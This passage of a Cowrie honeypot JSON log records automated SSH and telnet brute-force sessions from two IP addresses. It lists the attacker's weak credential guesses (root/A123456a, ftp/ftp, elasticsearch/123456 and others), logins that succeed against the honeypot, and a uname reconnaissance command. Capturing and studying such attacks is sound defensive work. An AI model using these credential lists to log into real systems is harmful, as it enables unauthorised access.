openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:19:01.499893Z","src_ip":"212.227.125.160","session":"b5efe41672bd"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:19:02.376892Z","src_ip":"212.227.125.160","session":"b5efe41672bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:19:04.893736Z","src_ip":"212.227.125.160","session":"b5efe41672bd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:19:04.894619Z","src_ip":"212.227.125.160","session":"b5efe41672bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:05.114548Z","src_ip":"212.227.125.160","session":"b5efe41672bd"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:05.115745Z","src_ip":"212.227.125.160","session":"b5efe41672bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53886,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce9ffcf46fde","protocol":"ssh","message":"New connection: 212.227.235.229:53886 (1.2.3.4:22) [session: ce9ffcf46fde]","sensor":"my-vps","timestamp":"2025-08-28T07:19:07.828654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:19:07.829490Z","src_ip":"212.227.235.229","session":"ce9ffcf46fde"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:19:08.083345Z","src_ip":"212.227.235.229","session":"ce9ffcf46fde"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:19:08.847073Z","src_ip":"212.227.235.229","session":"ce9ffcf46fde"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:19:09.440977Z","src_ip":"212.227.235.229","session":"ce9ffcf46fde"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:19:09.441756Z","src_ip":"212.227.235.229","session":"ce9ffcf46fde"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:09.699365Z","src_ip":"212.227.235.229","session":"ce9ffcf46fde"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:09.700640Z","src_ip":"212.227.235.229","session":"ce9ffcf46fde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33490,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb505b2d1aff","protocol":"ssh","message":"New connection: 212.227.125.160:33490 (1.2.3.4:22) [session: bb505b2d1aff]","sensor":"my-vps","timestamp":"2025-08-28T07:19:17.362259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:19:17.363314Z","src_ip":"212.227.125.160","session":"bb505b2d1aff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:19:17.578905Z","src_ip":"212.227.125.160","session":"bb505b2d1aff"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:19:18.227536Z","src_ip":"212.227.125.160","session":"bb505b2d1aff"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:19.446192Z","src_ip":"212.227.125.160","session":"bb505b2d1aff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55418,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e6421945288","protocol":"ssh","message":"New connection: 212.227.235.229:55418 (1.2.3.4:22) [session: 3e6421945288]","sensor":"my-vps","timestamp":"2025-08-28T07:19:23.790925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:19:23.791822Z","src_ip":"212.227.235.229","session":"3e6421945288"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:19:24.047033Z","src_ip":"212.227.235.229","session":"3e6421945288"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:19:24.814692Z","src_ip":"212.227.235.229","session":"3e6421945288"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:26.071831Z","src_ip":"212.227.235.229","session":"3e6421945288"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60418,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b4dbee0ac83","protocol":"ssh","message":"New connection: 212.227.125.160:60418 (1.2.3.4:22) [session: 4b4dbee0ac83]","sensor":"my-vps","timestamp":"2025-08-28T07:19:33.289410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:19:33.290359Z","src_ip":"212.227.125.160","session":"4b4dbee0ac83"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:19:33.514715Z","src_ip":"212.227.125.160","session":"4b4dbee0ac83"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T07:19:34.191749Z","src_ip":"212.227.125.160","session":"4b4dbee0ac83"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:35.418683Z","src_ip":"212.227.125.160","session":"4b4dbee0ac83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57677,"dst_ip":"1.2.3.4","dst_port":23,"session":"87d50db5be52","protocol":"telnet","message":"New connection: 212.227.125.160:57677 (1.2.3.4:23) [session: 87d50db5be52]","sensor":"my-vps","timestamp":"2025-08-28T07:19:38.566406Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35578,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6aff1e36257","protocol":"ssh","message":"New connection: 212.227.235.229:35578 (1.2.3.4:22) [session: a6aff1e36257]","sensor":"my-vps","timestamp":"2025-08-28T07:19:39.705075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:19:39.705832Z","src_ip":"212.227.235.229","session":"a6aff1e36257"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:19:39.961079Z","src_ip":"212.227.235.229","session":"a6aff1e36257"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T07:19:40.728760Z","src_ip":"212.227.235.229","session":"a6aff1e36257"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:41.987572Z","src_ip":"212.227.235.229","session":"a6aff1e36257"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57824,"dst_ip":"1.2.3.4","dst_port":23,"session":"a23626c6f9fb","protocol":"telnet","message":"New connection: 212.227.125.160:57824 (1.2.3.4:23) [session: a23626c6f9fb]","sensor":"my-vps","timestamp":"2025-08-28T07:19:45.833683Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58672,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f2deddb6026","protocol":"ssh","message":"New connection: 212.227.125.160:58672 (1.2.3.4:22) [session: 3f2deddb6026]","sensor":"my-vps","timestamp":"2025-08-28T07:19:49.310491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:19:49.311367Z","src_ip":"212.227.125.160","session":"3f2deddb6026"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:19:49.599364Z","src_ip":"212.227.125.160","session":"3f2deddb6026"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:19:50.277491Z","src_ip":"212.227.125.160","session":"3f2deddb6026"}
{"eventid":"cowrie.session.closed","duration":12.847008228302002,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:51.413355Z","src_ip":"212.227.125.160","session":"87d50db5be52"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:51.503804Z","src_ip":"212.227.125.160","session":"3f2deddb6026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57935,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d6c9a28ed8c","protocol":"telnet","message":"New connection: 212.227.125.160:57935 (1.2.3.4:23) [session: 4d6c9a28ed8c]","sensor":"my-vps","timestamp":"2025-08-28T07:19:51.593052Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45728,"dst_ip":"1.2.3.4","dst_port":22,"session":"a30837986332","protocol":"ssh","message":"New connection: 212.227.235.229:45728 (1.2.3.4:22) [session: a30837986332]","sensor":"my-vps","timestamp":"2025-08-28T07:19:56.035653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:19:56.036574Z","src_ip":"212.227.235.229","session":"a30837986332"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:19:56.295955Z","src_ip":"212.227.235.229","session":"a30837986332"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:19:57.086158Z","src_ip":"212.227.235.229","session":"a30837986332"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:58.348712Z","src_ip":"212.227.235.229","session":"a30837986332"}
{"eventid":"cowrie.session.closed","duration":13.614660501480103,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:19:59.448274Z","src_ip":"212.227.125.160","session":"a23626c6f9fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58040,"dst_ip":"1.2.3.4","dst_port":23,"session":"455623fa8d44","protocol":"telnet","message":"New connection: 212.227.125.160:58040 (1.2.3.4:23) [session: 455623fa8d44]","sensor":"my-vps","timestamp":"2025-08-28T07:19:59.584113Z"}
{"eventid":"cowrie.session.closed","duration":12.5967857837677,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:04.189768Z","src_ip":"212.227.125.160","session":"4d6c9a28ed8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58166,"dst_ip":"1.2.3.4","dst_port":23,"session":"39bf8b6a2622","protocol":"telnet","message":"New connection: 212.227.125.160:58166 (1.2.3.4:23) [session: 39bf8b6a2622]","sensor":"my-vps","timestamp":"2025-08-28T07:20:04.424067Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38120,"dst_ip":"1.2.3.4","dst_port":22,"session":"a77d08f9c66f","protocol":"ssh","message":"New connection: 212.227.125.160:38120 (1.2.3.4:22) [session: a77d08f9c66f]","sensor":"my-vps","timestamp":"2025-08-28T07:20:06.051644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:20:06.059710Z","src_ip":"212.227.125.160","session":"a77d08f9c66f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:20:06.270498Z","src_ip":"212.227.125.160","session":"a77d08f9c66f"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-28T07:20:07.143716Z","src_ip":"212.227.125.160","session":"a77d08f9c66f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:08.364078Z","src_ip":"212.227.125.160","session":"a77d08f9c66f"}
{"eventid":"cowrie.session.closed","duration":12.723011016845703,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:12.307055Z","src_ip":"212.227.125.160","session":"455623fa8d44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54026,"dst_ip":"1.2.3.4","dst_port":22,"session":"61ed9404949b","protocol":"ssh","message":"New connection: 212.227.235.229:54026 (1.2.3.4:22) [session: 61ed9404949b]","sensor":"my-vps","timestamp":"2025-08-28T07:20:12.502064Z"}
